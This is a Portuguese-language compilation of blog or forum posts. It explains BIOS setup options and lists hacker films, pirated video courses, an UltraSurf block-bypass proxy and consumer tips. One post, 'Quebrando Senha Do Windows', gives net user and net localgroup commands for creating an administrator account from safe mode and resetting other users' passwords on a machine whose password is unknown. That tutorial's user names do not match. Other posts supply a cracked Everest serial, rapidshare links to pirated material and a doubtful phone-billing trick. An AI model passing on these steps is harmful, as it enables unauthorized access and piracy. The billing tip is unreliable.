Vídeo Bios Shadow : Os dados do Bios da placa de vídeo serão copiados para a
memória Ram. Recomenda-se a ativação dessa opção para melhorar o desempenho da
placa de vídeo em aplicativos MS-Dos
C8000-CBFFF Shadow, CC000-CFFFF Shadow, D0000-D3FFF Shadow, etc.
Através destas opções, Bios de outros dispositivos também serão copiados para a
memória Ram, melhorando a velocidade de acesso a estes dispositivos.Chipset Features Setup

Esta parte do Setup é a que possui maiores variações de opções dependendo da data e
modelo da BIOS, colocarei todas as opções de que tenho conhecimento existirem,
muitas não estarão disponíveis no Setup do seu micro.
Aqui estão localizadas as opções referentes ao desempenho da memória Ram.
Temos a opção de configurar os valores para o maior desempenho possível,
sacrificando um pouco da confiabilidade do equipamento, ou optar por configurações
menos agressivas a fim de aumentar a confiabilidade do equipamento. A escolha deve
depender da qualidade do Hardware do seu equipamento e de quanto você pretende
exigir da máquina. Em caso de problemas, bastará voltar aos valores antigos.
Auto Configuration : Através desta opção pode-se habilitar o recurso das configurações
do Chipset Features Setup serem feitas pelo próprio Bios, utilizando-se valores defalt .
Isto garante uma maior confiabilidade do micro, porém se perde em desempenho. O
ideal é configurar manualmente as opções. Em alguns modelos de BIOS existe além das
opções Enabled/Disabled a opção de auto-configuração para memórias de 70 nanos e
de 60 nanos, podendo configurar a opção de acordo com o tipo de memória usado (ver o
tutorial sobre memórias) Dram Timing Control : Opção para configurar a velocidade em que a memória Ram dosistema irá trabalhar, geralmente estão disponíveis as opções: normal, medium, fast e
turbo, sendo a turbo a mais rápida. Quanto mais alta a velocidade, mais rápido ficará o
micro como um todo, porém dependendo da qualidade das suas memórias, um valor
muito alto poderá causar travamentos, experimente o valor Turbo
primeiro, caso tenha
problemas tente baixar um pouco a velocidade.
Em alguns Bios os valores para esta opção aparecem na forma de seqüências de 4
números, que correspondem aos tempos de aceso. Neste caso, quanto mais baixos os
números, maior a velocidade.
Dram Read Burst (EDO/FPM) : Define o tempo de espera entre cada ciclo de leitura da
memória Ram. Quanto menor o tempo, mais rápida será a velocidade de operação das
memórias. Geralmente estão disponíveis as opções: x222 , x333 e x444, sendo x222 o
mais rápido.

Caso esteja usando memórias EDO, provavelmente não terá problemas usando a opção
x222. usando memórias FPM o valor correto será x333 ou x444.
Dram Write Burst Timing : Tempo de espera entre cada ciclo de escrita da memória
Ram. Opções idênticas ao Dram Read Burst
Reduce Dram Leadoff Cycle : Opção de diminuir o tempo destinado ao primeiro ciclo
das memórias, melhorando o desempenho do micro. Dependendo da qualidade das
memórias o acionamento dessa opção pode causar travamentos, mas o ideal é mante-la
ativada.
Cache Timing : Velocidade na qual o cache L-2 da placa mãe irá funcionar. Geralmente
estão disponíveis as opções fast e fastest . A menos que vc esteja desconfiado da
qualidade da sua memória cache, ou o micro esteja trabalhando em overclock, use opção
fastest para um melhor desempenho. Dram RAS# Precarge Time : Número de ciclos de CPU reservados para o sinal RAS#
(Row Adress Strobe) conservar sua carga antes da restauração dos dados da Ram


(refresh), geralmente estão disponíveis as opções 3 e 4 , significando 3 ou 4 ciclos de
CPU, é recomendável manter o valor mais baixo para um melhor desempenho.
Dram R/W Leadoff Timing : Número de ciclos de CPU dados à memória Ram antes de
cada ciclo de leitura ou escrita. O valor mais baixo resulta em um melhor desempenho.
Speculative Leadoff : Alguns chipsets oferecem esse recurso, que pode ser ativado ou
desativado no Setup. Quando ativado, ele aumenta a velocidade do primeiro acesso à
memória de cada ciclo, conseguindo-se um pequeno aumento de performance
Interleaving : É uma técnica usada em alguns chipsets mais recentes para melhorar a
performance das memórias, esta função pode ser ativa no Setup das pacas compatíveis.
Com esse recurso o processador pode transferir mais dados para a Ram no mesmo
espaço de tempo, aumentando a performance.
ISA Bus Clock : Velocidade de operação do barramento ISA em relação à velocidade do
barramento PCI, nesta opção pode-se escolher entre 1/3 ou 1/ 4 da velocidade do
barramento PCI. Usando Bus de 66 ou 100 mhz, a opção correta é 1/ 4. Caso o seu
processador utilize bus de 50 mhz (Pentium 75) a opção correta é 1/3
System BIOS Cacheable : Habilita ou não o cacheamento da memória Ram ocupada
pelo BIOS da placa mãe. Esta opção pode ficar ativada para um melhor desempenho do
sistema em aplicativos MS-Dos Vídeo BIOS Cacheable : Habilita ou não o cacheamento da memória Ram ocupada pelo
BIOS da placa de vídeo, aumentando o desempenho dap laca em aplicativos MS-Dos
8 Bit I/O Recovery Time e 16 Bit I/O Recovery Time : Tempo de espera em ciclos de
CPU em operações de transferência de dados do barramento PCI para o barramento
ISA.
Peer Concurrency : Opção para dois ou mais dispositivos PCI funcionarem ao mesmo
tempo, deve ficar ativada.
Power Management Setup

Aqui estão as configurações relacionadas ao modo de economia de energia, uma boa
configuração pode economizar vários reais na conta do final do mês :- )
Power Management : Define o tempo antes da ativação dos modos doze, standbdos modos doze, standby e
suspend para economia de energia:
Disabled : todos os recursos de economia de energia ficarão desativados
Min Saving : Economia mínima de energia, os recursos entram em apenas depois de
uma hora de inatividade do micro.
Max Savig : Economia máxima de energia todos os recursos de economia estarão
ativados.User Defined : Permite definir manualmente cada opção
PM Control by APM : Define se o padrão APM (Advanced Power Management) existe no
seu sistema, este permite uma maior economia de energia. Deve ficar ativada.
Doze Mode: Após o período escolhido nesta opção (pode ser de 1 mim até 1 hora) de
inatividade do computador, a CPU entrará em modo de economia, voltando ao modo
normal assim que houver qualquer atividade.
Standby Mode : Após o período escolhido nesta opção (pode ser de 1 mim até 1 hora)
de inatividade do computador, o monitor e o HD serão desligados, voltando ao modo
normal assim que houver qualquer atividade.
Suspend Mode : Após o período determinado, todos os dispositivos do micro, exceto a
CPU serão desligados
HDD Power Down : Tempo definido antes do HD ser desligado em caso de inatividade
do micro. Este modo não funciona em HD's SCSI
Wake Up Events in Doze & Standby e Power Down & Resume Events : Serve para
monitorar a atividade de algumas interrupções (IRQ's) permitindo ou não que estas
acordem o sistema: On: A interrupção selecionada pode acordar o sistema
Off: A interrupção selecionada não irá acordar o sistema
PNP/PCI Configuration Setup
Permite configurar opções relacionadas com o suporte a dispositivos por parte do Bios:

Plug and Play Aware OS : Nesta opção você deverá informar se o sistema operacional
instalado na máquina é compatível com o padrão plug and play. Caso você estrja usando
o Windows 95 ou 98, escolha "Yes" caso esteja utilizando
outro sistema operacional,
como o Linux, OS/2, Dos, etc. escolha "No", pois estes sistemas não são compatíveis
com o padrão plug and paly.
Resources Controlled by :
Auto : O sistema atribuirá automaticamente as definições de IRQ e DMA para todos os
dispositivos (opção altamente recomendada)
Manual : Permite atribuir as definições manualmente, neste caso, aparecerá uma lista de
interrupções disponíveis e você deverá configura-las manualmente, este processo é difícil
e qualquer erro pode impedir o boot do micro, selecione esta opção apenas se tiver
problemas com a configuração automática ou gostar de desafios.
Reset Configuration Data : Reinicializa ou não o ESCD ao sair do COMS Setup
Enabled : O ESCD será reiniciado automaticamente quando for instalado um novo
periférico, atribuindo endereços para ele automaticamente (opção recomendada)
Disabled : Não reinicializa o ESCD PCI IDE IRQ Map To : Configura o tipo de controladora IDE em uso:
PCI-Auto : O sistema determina automaticamente qual o tipo de controladora de disco
IDE está instalada no sistema (opção recomendada)
ISA: A controladora IDE é padrão ISA (use esta opção caso a sua controladora IDE seja
daquelas antigas que são espetadas em um slot ISA)
Primary IDE INT# e Secondary IDE INT# : Define qual a interrupção PCI que está
associada às interfaces IDE. Não é recomendável alterar os valores defalt
Integrated Peripherals
IDE Primary Master PIO , IDE Secundary Master PIO, IDE Primary Slave PIO e IDE
Secundary Slave PIO : Determina o PIO Mode (velocidade máxima de transferencia de
dados, ver tutorial sobre HD's) correspondente a cada disco ou CD-Rom Ide instalado:


Auto : O sistema irá determinar o PIO automaticamente (opção recomendada)
Mode 0 , Mode 1, Mode 2 e Mode 3 : modos usados em discos mais antigos.
Mode 4 :Usado na maioria dos HD's de até 1 ano atrás
UDMA : Utilizado pelos HD's mais novos
Prefira usar a opção Auto, para que o próprio Bios detecte o Modo usado por cda
dispositivo
PCI IDE 2 nd Channel : Habilita ou não o uso de uma placa controladora IDE externa,
conectada a um Slot PCI funcionando como IDE secundária
On-Chip Primary PCI IDE e On-Chip Secundary PCI IDE : Permite desabilitar as
interfaces PCI embutidas na placa mãe:
Enabled : Habilita a interface IDE embutida na placa mãe)
Disabled : Desabilita a interface IDE da placa mãe para o uso de uma placa externa
conectada a um Slot PCI.
USB Controller : Habilita ou não o uso de um controlador USB (Universal Serial Bus)
deixe esta opção ativada caso esteja fazendo uso de algum dispositivo USB
Onboard FDD Controller : Habilita ou não a controladora de drivers de disquete
embutida na placa mãe. Esta opção deverá ficar ativada à menos que vc vá conectar
uma controladora externa.
2 Onboard Serial Port 1 e Onboard Serial Port: Permite habilitar/desabilitar e
especificar os endereços para a porta para as postas seriais do micro. A porta serial
primária geralmente é utilizada pelo Mouse e a segunda quase sempre está vaga (aquela saída de 25 pinos do lado da saída do mouse). Por defalt a porta serial primária
(Onboard Serial Port 1) utilizada pelo mouse, usa a Com 1 e o endereço 3f8, caso vc
instale algum periférico que vá utilizar esta porta (um modem configurado para utilizar a
Com 1 por exemplo) poderá mudar a porta utilizada pelo mouse para evitar conflitos.
As opções são:
Disabled : Desabilita a porta serial
3F8h, 2F8h, 3E8h, 2E8h : Especifica o endereço da porta
Onboard Parallel Port : Esta é a porta da impressora, aqui você poderá desabilita-la ou
mudar o endereço atribuído para ela

Onboard Parallel Port Mode : Determina o modo de operação da porta paralela do
micro. Geralmente estão disponíveis as opções Normal, Bidirecional, ECP e EPP. Os
modos Normal e Bidirecional são mais bem mais lentos. A diferença entre eles é que o
modo Bidirecional permite comunicação bidirecional. O modo ECP é mais rápido, sendo
usado por impressoras um pouco mais modernas, além de ser compatível com a maioria
dos Scanners, Zip Drives e outros dispositivos que utilizam a porta paralela. Temos
também o EPP com velocidade semelhante ao ECP porém com menos recursos.
ECP Mode Use DMA : Especifica o canal DMA a ser usado pela porta paralela caso seja
escolhido o modo ECP
Mais Opções
Load Setup Defalts
Carrega os valores defalt do Bios para todas as opções do CMOS Setup.
Password Setting :
No Setup também existe a opção de se estabelecer um senha para o uso do micro, esta
senha poderá ser solicitada toda vez que se inicializar o micro, ou somente para se
alterar os dados do Setup, isto pode ser definido na opção "Security Option" do Bios
Features Setup. Caso se esqueça a senha do micro, é possível retirá-la apagando todos
os dados do CMOS, para isso vc deverá abrir o micro e retirar a bateria da placa mãe por
alguns minutos recolocando-a em seguida, em algumas placas mãe isto é feito mudandose
a posição de um jumper específico. IDE HDD Auto Detection :
Esta é a opção de permitir ao Setup configurar automaticamente todos os discos IDE que
você tem no micro, ao instalar um disco novo, não deixe de usar esta opção para
configura-lo automaticamente.
Save & Exit Setup
Salvar todas as auterações e sair
Exit Without Saving
Sair sem salvar qualquer alteração

Links de Filmes Hackers

Caçada Virtual
http://cinebloteca.blogspot.com/2008/04/2000-hackers-2-caada-virtual.html

firewall seguraça em risco [dublado]
http://filmesparabaixardownload.blogspot.com/2008/08/firewall-segurana-em-risco-dublado.html

Piratas do Vale do Silício
Sinopse: Mostra como Bill Gates e Steve Jobs fundaram as respectivas Microsoft e Apple e a concorrência entre os dois para ver quem chegava primeiro e as estratégias que utilizaram para criarem suas empresas.
Áudio: Inglês
Legenda: Português
Tamanho: 315 Mb
Formato: Rmvb
Qualidade: DVDRip
Hospedagem: Rapidshare

Download do Filme dividido em partes:
http://rapidshare.com/files/77776783/Pirates_of_Silicon_Valley.part1.rarhttp://rapidshare.com/files/77771304/Pirates_of_Silicon_Valley.part2.rarhttp://rapidshare.com/files/77773701/Pirates_of_Silicon_Valley.part3.rarhttp://rapidshare.com/files/77774306/Pirates_of_Silicon_Valley.part4.rar

HACKERS - PIRATAS DE COMPUTADOR - 1995
SINOPSE: Dave Murphy (Jonny Lee Miller), Conhecido no mundo dos hackers por Zero Cool, é uma lenda conhecida, pois ao seus 11 anos derrubou em torno de 1500 sistemas com um virus que criou. Foi condenado pela justiça a não tocar num computador até seus 18 anos. Após isso, envolve-se novamente com a pirataria cibernética com o nick Crash Override, em que descobre um ousado crime em andamento e tenta impedi-lo a qualquer custo, pois sua liberdade encontra-se em risco mais uma vez.
Formato: RMVB
Gênero: Suspense
Duração: 107 min
Origem: EUA
Estúdio: United Artists
Direção: Iain Softley
Roteiro: Rafael Moreu
Produção: Janet Graham, Michael Peyser, Selwyn Roberts, Iain Softley, Ralph Winter
Áudio: Inglês
Legendas: Português-BR (embutidas)
Tamanho: 353MB (5 partes)
Servidor: Rapidshare

Download do filme dividido em partes:
http://rapidshare.com/files/93944321/Hackers.1.By.3DarkMan.part1.rarhttp://rapidshare.com/files/93972143/Hackers.1.By.3DarkMan.part2.rarhttp://rapidshare.com/files/94000456/Hackers.1.By.3DarkMan.part3.rarhttp://rapidshare.com/files/94032377/Hackers.1.By.3DarkMan.part4.rarhttp://rapidshare.com/files/94022147/Hackers.1.By.3DarkMan.part5.rar

HACKERS 2: A CAÇADA VIRTUAL - 2000
SINOPSE: Caçada Virtual Conta a estória de como um dos maiores "Hackers" da atualidade, Kevin Mitnick, passou a perna no FBI e tornou-se um dos Hackers mais procurados dos EUA. Sempre em busca de informação, Kevin virou um marco na internet, pois, a partir dos seus atos, foi possível reconhecer a falta de segurança existente nos sistemas online da atualidade. Não só de invasões online vivem os hackers, nesse filme, Kevin demonstra umas de suas principais habilidades, Engenharia Social, pela qual, consegue convencer as pessoas, através de conversas totalmente inofensivas, a lhe passarem informações confidenciais.

Formato: RMVB
Gênero: Suspense
Tempo: 92 min
Áudio: Inglês
Legendas: Português-BR (embutidas)
Duração: 1:31
Tamanho: 301MB (4 partes)
Servidor: Rapidshare
Download do filme dividido em partes:
http://rapidshare.com/files/76362485/Takedown_Legendado.part1.rarhttp://rapidshare.com/files/76492561/Takedown_Legendado.part2.rarhttp://rapidshare.com/files/76505242/Takedown_Legendado.part3.rarhttp://rapidshare.com/files/76508643/Takedown_Legendado.part4.rar

Quebra de Sigilo
http://www.elitedosfilmes.com/2008/08/download-quebra-de-sigilo-dublado.html

[SOFT]Proxy Portatil

Pra quem sofre tentando acessar sites bloqueados na faculdade, bibliotecas publicas, no trabalho, lan house ou até mesmo na sua casa quando Seu pc ta com aquele virus
que não te deixa acessar o dominio da microsoft ou sites de antivirus aqui esta a solução.

O Ultra Surf é um proxy portatil de 419 KB. Não é necessário instalar, basta baixar e abri-lo. Ele ultiliza o IE para navegar e acessar normalmente os sites bloqueados.

As vantagens do ultra surf quando comparado aos outros proxys online é sua velocidade de acesso, você consegue acessar sites com altos critérios de segurança sem aparecer alertas, privacidade pois os cookies e histórico são apagados, seu ip fica anonimo etc.

Ta ai, ótima dica para levar sempre no seu pen drive, afinal nunca se sabe quando vai precisar.

http://www.baixaki.com.br/download/ultrasurf.htm

[Tuto] Tunando o seu v3

tem muita gente que bate cabeça com o V3
dizendo que nao consegue identificar na porta USB e tal
por que usa o P2k,motorola phone toolls, usa o motomidma,skinmanager,drives para o pc reconhecer o v3 e nao consegue..
facil vou ensinar como reconhecer seu v3(v3re.v300,v3razr etc....)
primeiro baixem esse programa e descompactem
http://esnips.co.il/doc/21455414-7085-4751-b702-ab9e6cd372f1/MoST---MotoSupertrubka-0%5B1%5D.00.01
(lembrete a bateria do cel nao pode tar vazia, se nao o pc noa reconhece, dê uma carregadinha nela :) )
conecte o cel no cabo USB e depois o cabo no pc(o cell tem que tar ligado)
abra o programa
clique em refresh
ele vai carregar os arquivos do seu cell
clique em " File Manager " e as pastas do celular vão aparecer ele só tem a partição /a/
la vai ter sons
skins
images
etc...
é so vc apagar as que ja vem no seu cell
apague tbm videos etc...
da pra almentar volume do seu motorola( nao aconselho fazer por que isso estraga a vida util da plaquinha do celular)
da pra apagar os jogos fuleiros que ja vem no v3
colocar jogos
aaa uma coisa otima que da pra fazer
se vc excluir as merdas do v3
sua memoria vai dar um boa almentada..

http://www.4shared.com/file/57986402/7ae3eba/Most_Moto_Supertrubka_00001.html

[Down] QBrushes para PHOTOSHOP

http://qbrushes.net/

[VIDEO AULAS] HTML, PS, CSS, E AFINS.

Aqui nestes 2 sites, você encontra diversas video aulas, para aprender a mexer com Ps, linguagem html, Dreamweaver, Flash, Css, Php, e outros.

http://www.allartes.com/videoaulas.html
***

http://www.adrianogianini.com.br/videoblog/

[DICA] Direitos do Consumidor

Serviço 102
Quando você precisar do serviço 102, que custa R$ 2,05.
Lembre-se que agora existe o concorrente que cobra apenas R$ 0,29 por
informação: fone
0300-789-5900.
Você sabia disso?

*Correios*
Se você tem por hábito utilizar os Correios, para enviar
correspondência, observe que se enviar algo de pessoa física para pessoa
física, num envelope leve, ou seja, que contenha duas folhas mais ou menos,
para qualquer lugar/Estado, e bem abaixo do local onde
coloca o CEP escrever a frase 'Carta Social', você pagará somente R$0,01
por ela. Isso está nas Normas afixadas nas agências dos correios, mas é
claro que não está escrito em letras graúdas e nem facilmente visível. O
preço que se paga pela mesma carta, caso não se escreva 'Carta Social',
conforme explicado acima custará em torno de R$0,27 (a grama). Agora
imaginem no Brasil inteiro,quantas pessoas desconhecem este fato e pagam
valores indevidos por uma carta pessoal diariamente?

*Telefone Fixo para Celular* - A MELHOR DE TODAS!!!
Se você ligar de um telefone fixo da sua casa para um
telefone celular, será cobrada sempre uma taxa a mais do que uma ligação
normal, ou seja, de celular para celular. Mas se acrescentar um número a
mais, durante a discagem, lhe será cobrada apenas a tarifa local normal..
Resumindo: Ao ligar para um celular sempre repita o ultimo dígito do número.

Exemplos:
9XXX - 2522 + 2
9X7X - 1345 + 5Atenção: o número a ser acrescido deverá ser sempre o último número do telefone celular chamado!
*Lista Telefônica Informações
Para informações da lista telefônica, use o nº 102030 que
é gratuito, enquanto que o 102 e 144 são pagos e caros.

[SOFT]Everest

Acredito que muitos ja conhecem ou ouviram falar do everest. Mas pra quem não conhece....

O Everest Ultimate Edition é um programa completo de diagnóstico de seu computador. Ele exibe as características do hardware, oferece parâmetros para comparação, gera e exibe relatórios e apresenta alguns aspectos do que está ocorrendo em tempo real em seu computador (como processos em andamento).
-------------Portatil Para Levar no Pen Drive--------------
http://*rapidshare.*com/files/61343713/Everest.UEE.4.00.1053.zip

[exclua os " * "
---------------------------Instalavel----------------------------
http://www.baixaki.com.br/download/everest-ultimate-edition.htm

Registro:
Name: acme paranoici
S/N: WDW222236-61636D6520706172616E6F696369

Créditos Pelo Registro:
http://www.orkut.com.br/Main#CommMsgs?cmm=47456576&tid=5269630267525211639

Escreva Na folha de Caderno

[Exclua os " * "]

<*table width="330" height="163" border="0" bgcolor="#FFFFFF">
<*HR WIDTH=100% ALIGN=RIGHT COLOR="#33CCFF" NOSHADE>Digite Aqui
<*HR WIDTH=100% ALIGN=RIGHT COLOR="#33CCFF" NOSHADE>Digite Aqui
<*HR WIDTH=100% ALIGN=RIGHT COLOR="#33CCFF" NOSHADE>Digite Aqui
<*HR WIDTH=100% ALIGN=RIGHT COLOR="#33CCFF" NOSHADE>Digite Aqui
<*HR WIDTH=100% ALIGN=RIGHT COLOR="#33CCFF" NOSHADE>Digite Aqui
<*HR WIDTH=100% ALIGN=RIGHT COLOR="#33CCFF" NOSHADE>Digite Aqui
====================================================
Digite Aqui
Digite Aqui
Digite Aqui
Digite Aqui
Digite Aqui
Digite Aqui

[DICA] Códigos HTML

Códigos de HTML para enfeitar seu texto =D

Tirem os " * "

<*b>
negrito

italico
<*i>

sublinhado
<*u>

riscado
<*s>

texto no centro
<*center>
ou
<*p align="center">

letra grade facil de fazer
<*big>
ou
<*h1>

letra grande
<*font size="5">
letra do tamanho que quizer (troque o numero 100 pelo que quizer)

aprendi esse tambem
<*span style=font-size:100px>

letra pequena
<*small>

ou do tamanho que quizer trocando o numero 2
<*span style=font-size:2px>

cor da letra (troca o red por qualquer cor em ingles)
<*font color="red">

cor de fundo (troca o black por qualquer cor em ingles)
<*table bgcolor="black">

borda
<*table border="5">

tipo de letra
<*font face="Comic Sans MS">


quando um codigo começar com o mesmo tipo pode juntar exemplo:
<*font color="green" face="Comic Sans MS">

exemplo 2
<*table bgcolor="black" border="5" color="black"><*font color="white" size="9" face="Comic Sans MS">

texto piscando
<*div style="text-decoration:blink">>

o texto piscando nao funciona no internet explorer 6 eu acho
e para parar de piscar coloque sempre <*/div>

sempre que vc quizer terminar uma ação em html usa a barra como aqui no orkut
se começa com table tem que colocar uma barra exemplo:
<*table bgcolor="red">seu texto<*/table>
<*/font>
<*/b> e etc..

Não se esqueçam, tirem os " * "

[TUTO]Shell Script

O que é shell?
Shell é uma linha de comando. Ele é a ponte de ligação entre o usuário e o Kernel. O kernel é quem acessa os equipamentos de hardware da maquina.
Ex:
Usuário -> Shell -> Kernel ->Hardware

Scripts Shell podem ser utilizados para criar executaveis que execultem tarefas simples. Sua vantagem é ter accesso quase que irrestrito as configurações e modificações do sistema. Para os que vêm do mundo MSDOS, pense no shell como um Batch (dos arquivos .BAT). O shell é como um Batch (muito) melhorado.

Pra quem se interessar pelo assunto:
Apostila: http://aurelio.net/shell/apostila-introducao-shell.pdf
Site: http://aurelio.net/shell/

PowerShell é uma versão melhorada do Prompt voltada para o uso de scripts. Download:
http://www.microsoft.com/windowsserver2003/technologies/management/powershell/download.mspx

Quebrando Senha Do Windows

Diferentes situações e meios de burlar a autenticação de usuário de Windows.

1ºVocê pretende se logar em uma maquina, mas não tenho a senha de administrador e nem usuário. Faça o seguinte:

Primeiro reinicie a máquina, aperte F8 para entrar em modo de segurança.

Aparecerá as opções de inicialização
Escolha a Opção "Modo Seguro com Linha de Comando" ou "Safe Mode With Command Prompt" caso esteja em inglês.

Após aparecer a tela do DOS Digite
net user skin /add (Aperte Enter)

Depois digite:
net localgroup administradores Joey /add (Aperte Enter)

Caso esteja em inglês a linha deverá estar assim:
net localgroup administrators Joey /add

Ps: Joey foi um nome de usuário definido por mim.

Reinicie a máquina digitando:
shutdown -r -t 00

Faça o login com o usuário criado
Os privilégios deste usuário são os mesmos do administrador.

Se você quer ser o único administrador siga esses passos a seguir:
Vá em:
INICIAR > PAINEL DE CONTROLE > FERRAMENTAS ADMINISTRATIVAS > GERENCIAMENTO DO COMPUTADOR
Clique em "Usuários e Grupos Locais" e no Painel à direita clique em usuários.
Com o botão direito clique em administrador e selecione definir senha, clique em prosseguir (Se houver Confirmação) e adicione a nova senha.

Logue como administrador com a senha nova e exclua o usuário que foi criado.

2ºVocê ja esta logado em uma maquina e pretende alterar a senha de algum usuário mas não sabe.

-Vá em Iniciar ->Executar e digite: control userpasswords2
-Clique em Ok
Vai abrir uma janela com as contas de usuários. Basta selecionar uma e redefinir a senha sem nem mesmo saber a senha atual.

3ºUma situação Qualquer...
Abre o dos e digita:
net user administrador Nova_Senha

4ºMais simples e menos util de todos.
Ligue o Pc em modo de segurança com a janela do dos igual na 1º situação.
Digite lusrmgr.msc e de enter.
Adicione seu usuário.
[Você tambem pode utilizar este ultimo exemplo indo em iniciar -> executar e digitando lusrmgr.msc]

Curso Interativo Macromedia Flash MX

Excelente Curso Interativo Macromedia Flash MX, é dividido em várias vídeo-aula, estas divididas por assuntos específicos e, apenas assistindo às vídeos-aula e acompanhando no programa, consegue-se obter um domínio total sobre a ferramenta.o arquivo é apenas 46 MB, mas depois de descompactado torna-se 290 MB de puras aulas.

Tamanho : 46 MB
http://rapidshare.com/files/118701988/CursoInterativoMX.rar

Cursos - Gravação de DVDs

Aprenda a criar DVDs do início ao fim.
Metodologia exclusica: você aprende interagindo com as aulas, clique a clique.
conceitos menus capítulos playlist gravação do projeto e muito mais

Tamanho : 37 MB
http://rapidshare.com/files/118716064/Curso_de_Gravacao_de__DVD.rar

Curso Camtasia Studio - criar vídeos e apresentações

Com o Camtasia Studio você pode criar vídeos e apresentações profissionais com facilidade. Crie treinamentos, palestras, apresentações para reunões e etc. Salve seus arquivos com o formato que você precisar, como Flash, Windows Media, QuickTime e etc.

Tamanho : 352 MB
http://rapidshare.com/files/121633611/curso_cantasia.part1.rar
http://rapidshare.com/files/122040147/curso_cantasia.part2.rar
http://rapidshare.com/files/122074440/curso_cantasia.part3.rar
http://rapidshare.com/files/122302474/curso_cantasia.part4.rar

Curso interativo edição video

Editar um filme ou vídeo não se limita a escolher as melhores cenas, é nesta fase da produção que são inseridos efeitos especiais, trilhas sonoras e legendas.

Tamanho : 240 Mb
http://rapidshare.com/files/122772698/curso.interativo.edicao.video.by.patruska-www.therebels.com.br.part1.rar
http://rapidshare.com/files/122777040/curso.interativo.edicao.video.by.patruska-www.therebels.com.br.part2.rar
http://rapidshare.com/files/122797964/curso.interativo.edicao.video.by.patruska-www.therebels.com.br.part3.rar

Video Aula -Curso Excel Avançado

Tamanho : 88 MB
http://rapidshare.com/files/129527833/Curso.Video-Aula.Excel.Avancado.rar

Curso Completo - AutoCAD

Nome: Curso AutoCAD 2008
Fabricante: Digerati
Sistema Operacional: Windows
Estilo: Vídeo Aula
Ano de Lançamento: 2008
Tamanho: 340MB
Formato: mdf

http://rapidshare.com/files/151550588/Curso_AutoCAD_2008.part1.rar
http://rapidshare.com/files/151558856/Curso_AutoCAD_2008.part2.rar

VIDEO AULA - Curso Sony Vegas 7.0

Video aula completa
Aprenda a editar vídeos com o Sony Vegas 7.0
- Textos e Backgrounds
- Integração com outros aplicativos
- Trabalhando com áudio
- Efeitos de vídeo e áudio
- Transições
- Ajustes de cores
- Gerenciamento de projetos
- Trackmotion

Tamanho: 145 MB
http://rapidshare.com/files/150336646/Curso_Vegas_-_d_g_r_t.rar

Curso Interativo Completo de Blogs e Flogs

O curso é totalmente dividido e organizado em menus modernos, a aula é em vídeo e narrado por um professor em audio de boa qualidade, com um conteúdo de forma fácil de ser entendida.

Tamanho : 57 MB
http://www.4shared.com/file/58064273/ff1bb392/Curso_Interativo_de_Blogs_e_Flogs_-_Editora_Europa.html

Curso Completo de Construção de Sites

Aprenda a fazer sites em casa, sem gastar nada. São 26 videoaulas que ensinam, passo a passo, tudo o que você precisa saber para fazer e colocar seu site na Internet.

Tamanho : 83 MB
http://rapidshare.com/files/116753801/Curso_Interativo_CRIA__O_DE_SITES.rar

Masters - Web Sites com AJAX

O curso "Web Sites com AJAX" aborda tudo sobre o Ajax, desde a sua introdução, ao projeto final. Os capítulos são divididos em Javascript, DOM e DHTML, JavaScript não-obstrutivo, Ajax e o projeto final, em uma navegação fácil e dinâmica.
Você aprenderá além do Ajax, as tecnologias utilizadas para trabalhar com ele e a pensar nos usuários como um todo, ou seja, desenvolver um aplicativo apto a atender a todos os usuários, que possuam ou não o suporte ao JavaScript.
O estudo do curso é realizado por meio de navegação por browser, de maneira clara, fácil e didática.
Ao final do curso tem um projeto onde é possível colocar em prática, de forma simples, clara e objetiva, tudo que foi abordado, para que a compreensão seja privilegiada.
O projeto final consiste no desenvolvimento de uma agenda de contatos, utilizando a linguagem PHP e o banco de dados MySQL. Nele serão abordados os seguintes assuntos:

* Separação de camadas da web - conteúdo, apresentação, comportamento;
* JavaScript e JavaScript não-obstrutivo;
* DOM;
* Ajax;
* Inserção de registros em banco de dados via Ajax;
* Edição de registros em banco de dados via Ajax;
* Remoção de registros em banco de dados via Ajax;
* Atualização de contéudo via Ajax;
* E muito mais

Tamanho : 7 MB

Download:
- http://rapidshare.com/files/116726362/Curso_IMasters_-_AJAX.rar

Crie sites em 60 minutos

Guia passo a passo em tempo real. Faça você mesmo um web site de qualidade em uma hora! Aulas interativas feitas por profissionais, instruções claras e precisas. Você aprenderá criar sites comerciais e pessoais com os melhores softwares; Dreamweaver 8, Photoshop CS2, Fireworks 8. Sem complicação! Todos os passos: projeto gráfico, documentos HTML, gerenciamento, hospedagem e muito mais.

Tamanho: 124 MB
Download:
- http://rapidshare.com/files/122064817/Curso_Interativo_-_Crie_um_site_em_60_minutos.part1.rar
- http://rapidshare.com/files/122739491/Curso_Interativo_-_Crie_um_site_em_60_minutos.part2.rar

[DOWN] Pacote de Cursos Photoshop - Crie Efeitos Incríveis

[DOWN] Pacote de Cursos
Photoshop - Crie Efeitos Incríveis




Crie Efeitos Incríveis
Curso Prático em vídeo
Domine as técnicas avançadas do Photoshop
*Criação de efeitos
*Manipulação avançada de imagens
*Ferramentas especiais
100 minutos de videoaula
Contém tutoriais para usuários de todos os níveis:
Básico
Intermediário
Avançado

Aprenda a criar os mais incríveis efeitos especiais!!!
- Aplique efeitos de movimento de imagens
- Crie pinturas artísticas sobre fotos
- Mude as cores de qualquer elemento
- Aprenda a alterar a iluminação de suas fotos
- Transforme fotografias em ilustrações
- Crie cenários fantásticos usando duas ou mais fotos e recursos de tratamento

Tamanho: 115 MB

Download:
- http://rapidshare.com/files/124319791/Curso_Interativo_PHOTOSHOP_CS3.part1.rar
- http://rapidshare.com/files/122987793/Curso_Interativo_PHOTOSHOP_CS3.part2.rar

Várias funções

Programa com arquivos que agiliza o seu pc.
Alguns deles..

ATENÇÃO: SE CASO VOCÊ USAR O ARQUIVO ''Otimizar Várias Funções no XP'' NA PASTA ''VARIAS FUNÇÕES'', VOCÊ IRÁ MUDAR OS VALORES DO REGEDIT; ISSO NÃO É RUIM, PORÉM OS VALORES IRÃO DEIXAR UM POUCO MAIS LENTO SEU PC, COMPARANDO COM A 1ª DICA QUE EU DEI, SOBRE ''REGEDIT''!!

- Remover o Msn antigo
- XP Inicia mais rápido.
- Ativa o Large System Cache.
- Explora outras máquinas da rede mais rapidamente
- Deixa o Internet Explorer abrindo mais rápido.
- Recupera RAM após o fechamento dos programas.
- Habilita a desfragmentação do boot.
- Acelera o Menu iniciar.
- Aciona o NUMLOCK no Logon do Windows.
- Aumenta o Buffer do teclado.
- Acelera a taxa de Refresh das janelas.
- Outlook Mais Rápido ao iniciar.
- Maior rapidez pra iniciar programas em geral.
- Abrir o PROMPT de Comado em um Local Específico.
- Aumentar a Performance da Partição NTFS
- Aumentar a Velocidade das Aplicações de 16 Bits
